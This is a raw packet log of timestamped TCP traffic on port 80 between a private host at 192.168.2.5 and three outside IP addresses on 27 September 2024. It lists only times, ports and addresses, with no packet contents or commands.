Sep 27, 2024 04:21:15.662523031 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662553072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662657976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662667990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662678957 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662707090 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662736893 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662744999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662755013 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662765026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662775040 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662802935 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662828922 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662832022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662842989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662862062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662870884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662882090 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662883043 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662897110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662906885 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662908077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662939072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662971020 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662993908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663003922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663012981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663022995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663033962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663048029 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.663078070 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.663199902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663211107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663219929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663228989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663239002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663249016 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663258076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.663259983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663271904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.663285017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.663285017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.663316965 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.674794912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.674854040 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.674865961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.674879074 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.674896002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.674909115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.674921036 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.674923897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.674936056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.674940109 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.674962997 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.674988985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.675035000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675046921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675056934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675065994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675076962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675090075 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.675113916 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.675175905 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675192118 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675201893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675211906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675221920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675229073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.675231934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675242901 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675254107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.675259113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675272942 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.675290108 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.675339937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.675339937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.678698063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678710938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678720951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678759098 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.678769112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678781033 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.678787947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678801060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678811073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.678817987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678829908 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.678879023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.678879023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.678884983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678895950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678905964 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678945065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.678945065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.678971052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678985119 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.678994894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.679006100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.679013014 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.679060936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.700592995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.700654984 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.700794935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.700804949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.700814962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.700824022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.700834990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.700845957 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.700855017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.700886965 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.701044083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.701055050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.701064110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.701073885 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.701083899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.701093912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.701106071 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.701109886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.701112986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.701119900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.701154947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.704823971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.704854965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.704865932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.704884052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.704890013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.704927921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.704927921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.710639000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.710674047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.710686922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.710692883 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.710726023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.710728884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.710746050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.710757017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.710768938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.710768938 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.710803986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.710823059 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.733057976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.733093023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.733103991 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.733128071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.733140945 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.733146906 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.733151913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.733190060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.733194113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.733208895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.733238935 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.733238935 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.733270884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.742940903 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.742957115 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.742969036 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.743021965 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.743021965 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.743069887 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.743081093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.743091106 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.743115902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743129015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743140936 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.743140936 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.743148088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743160009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743176937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743176937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743190050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743201017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743208885 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743211985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743231058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743244886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743256092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743257046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743273020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743310928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743310928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743319988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743333101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743343115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743354082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743372917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743372917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743415117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743422985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743436098 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743447065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.743464947 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743464947 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.743486881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.744329929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.744405031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.752038956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752058029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752070904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752099037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752099037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752106905 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752119064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752131939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752142906 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752170086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752193928 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752310038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752320051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752367973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752386093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752408981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752419949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752444983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752475977 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752491951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752502918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752513885 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752518892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752537966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752568960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.752568960 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.752631903 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753031015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753082991 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753097057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753108025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753125906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753138065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753156900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753180981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753180981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753192902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753205061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753216028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753226042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753243923 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753267050 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753305912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753315926 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753315926 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753319025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753331900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753340960 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753343105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753372908 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753391981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753391981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753403902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753415108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753424883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753460884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753460884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753490925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753499985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753510952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753521919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753561020 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753582954 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753596067 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753607035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753618002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753649950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753654957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753662109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753676891 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753705978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753746033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753757954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753767967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753786087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753802061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753813028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753815889 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753815889 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753849030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753849983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753849983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753870010 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753894091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753906965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.753911972 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753942013 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753972054 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.753988981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754000902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754010916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754021883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754056931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754093885 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754131079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754144907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754156113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754168034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754179001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754185915 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754188061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754223108 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754266977 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754368067 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754376888 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754386902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754424095 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754447937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754450083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754467010 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754478931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754487038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754496098 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754503012 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754534006 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754534006 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754560947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754565954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754579067 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754587889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754622936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754645109 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754651070 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754662991 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754673004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.754700899 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.754730940 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.755064964 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.755074978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.755117893 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.769057035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769073009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769084930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769120932 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.769161940 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.769162893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769176006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.769186974 CEST	80	49724	176.113.115.95	192.168.2.5
